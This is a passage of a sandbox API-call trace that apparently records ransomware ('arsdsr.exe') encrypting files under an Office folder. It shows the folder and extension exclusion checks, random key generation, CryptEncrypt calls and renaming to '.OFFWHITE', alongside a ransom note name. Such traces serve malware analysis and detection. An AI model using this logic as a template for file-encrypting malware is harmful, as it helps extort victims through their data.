lpOverlapped=0x0) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] GetLastError () returned 0x0 [0144.991] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8e260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.991] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.991] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8e360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.991] WriteFile (in: hFile=0x218, lpBuffer=0x52eb10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb10*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.992] GetProcessHeap () returned 0x500000 [0144.992] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8e160) returned 0x2a60020 [0144.992] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.992] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x8e160, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x8e160, lpOverlapped=0x0) returned 1 [0145.041] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.041] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x8e160, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x8e160, lpOverlapped=0x0) returned 1 [0145.043] GetProcessHeap () returned 0x500000 [0145.043] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0145.047] CloseHandle (hObject=0x218) returned 1 [0145.047] GetProcessHeap () returned 0x500000 [0145.047] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.047] GetProcessHeap () returned 0x500000 [0145.047] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.047] GetProcessHeap () returned 0x500000 [0145.047] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.047] GetProcessHeap () returned 0x500000 [0145.047] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.047] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" [0145.047] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.OFFWHITE" [0145.047] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.offwhite")) returned 1 [0145.048] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749d2200, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x749d2200, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x5ab60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0145.048] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".") returned 1 [0145.048] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="..") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="...") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="windows") returned -1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="rsa") returned -1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="programdata") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="appdata") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="program files") returned 1 [0145.049] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="program files (x86)") returned 1 [0145.049] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.049] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="PUBWZINT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" [0145.049] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.049] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.049] PathFindExtensionW (pszPath="PUBWZINT.REST.trx_dll") returned=".trx_dll" [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.049] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.050] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.050] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.050] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.050] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.050] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.050] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.050] GetProcessHeap () returned 0x500000 [0145.050] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb20 [0145.050] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.058] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=371552) returned 1 [0145.058] GetProcessHeap () returned 0x500000 [0145.058] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.059] GetProcessHeap () returned 0x500000 [0145.059] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.059] GetProcessHeap () returned 0x500000 [0145.059] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.059] GetProcessHeap () returned 0x500000 [0145.059] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.059] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.059] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.059] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.059] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.059] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.059] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.060] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5ab60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.060] SetLastError (dwErrCode=0x0) [0145.060] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.061] GetLastError () returned 0x0 [0145.061] GetLastError () returned 0x0 [0145.062] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5ac60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.062] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.062] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5ad60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.062] WriteFile (in: hFile=0x218, lpBuffer=0x52eb20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb20*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.062] GetProcessHeap () returned 0x500000 [0145.062] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5ab60) returned 0x2960048 [0145.062] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.062] ReadFile (in: hFile=0x218, lpBuffer=0x2960048, nNumberOfBytesToRead=0x5ab60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295d1c0*=0x5ab60, lpOverlapped=0x0) returned 1 [0145.083] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.083] WriteFile (in: hFile=0x218, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x5ab60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295d1cc*=0x5ab60, lpOverlapped=0x0) returned 1 [0145.084] GetProcessHeap () returned 0x500000 [0145.084] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0145.084] CloseHandle (hObject=0x218) returned 1 [0145.084] GetProcessHeap () returned 0x500000 [0145.084] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.084] GetProcessHeap () returned 0x500000 [0145.084] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.084] GetProcessHeap () returned 0x500000 [0145.084] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.085] GetProcessHeap () returned 0x500000 [0145.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.085] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" [0145.085] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.OFFWHITE" [0145.085] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.offwhite")) returned 1 [0145.085] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d7a1200, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6d7a1200, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0145.085] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".") returned 1 [0145.085] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="..") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="...") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="windows") returned -1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="rsa") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="programdata") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="appdata") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="program files") returned 1 [0145.086] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.086] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.086] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="SGRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" [0145.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.086] PathFindExtensionW (pszPath="SGRES.DLL.trx_dll") returned=".trx_dll" [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.086] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.087] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.087] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.087] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.087] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.087] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.087] GetProcessHeap () returned 0x500000 [0145.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb30 [0145.087] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.088] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=13152) returned 1 [0145.088] GetProcessHeap () returned 0x500000 [0145.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.088] GetProcessHeap () returned 0x500000 [0145.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.088] GetProcessHeap () returned 0x500000 [0145.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.088] GetProcessHeap () returned 0x500000 [0145.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.088] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.088] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.088] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.089] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.089] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.089] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.089] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.089] SetLastError (dwErrCode=0x0) [0145.089] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.091] GetLastError () returned 0x0 [0145.091] GetLastError () returned 0x0 [0145.091] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.091] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.091] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.091] WriteFile (in: hFile=0x218, lpBuffer=0x52eb30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb30*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.091] GetProcessHeap () returned 0x500000 [0145.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3360) returned 0x5607c8 [0145.092] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.092] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3360, lpOverlapped=0x0) returned 1 [0145.093] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.093] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3360, lpOverlapped=0x0) returned 1 [0145.093] GetProcessHeap () returned 0x500000 [0145.093] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.093] CloseHandle (hObject=0x218) returned 1 [0145.098] GetProcessHeap () returned 0x500000 [0145.098] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.098] GetProcessHeap () returned 0x500000 [0145.098] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.098] GetProcessHeap () returned 0x500000 [0145.098] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.098] GetProcessHeap () returned 0x500000 [0145.098] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.098] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" [0145.098] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.OFFWHITE" [0145.098] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.offwhite")) returned 1 [0145.099] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8e7d800, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc8e7d800, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4160, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0145.099] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.100] lstrcmpiW 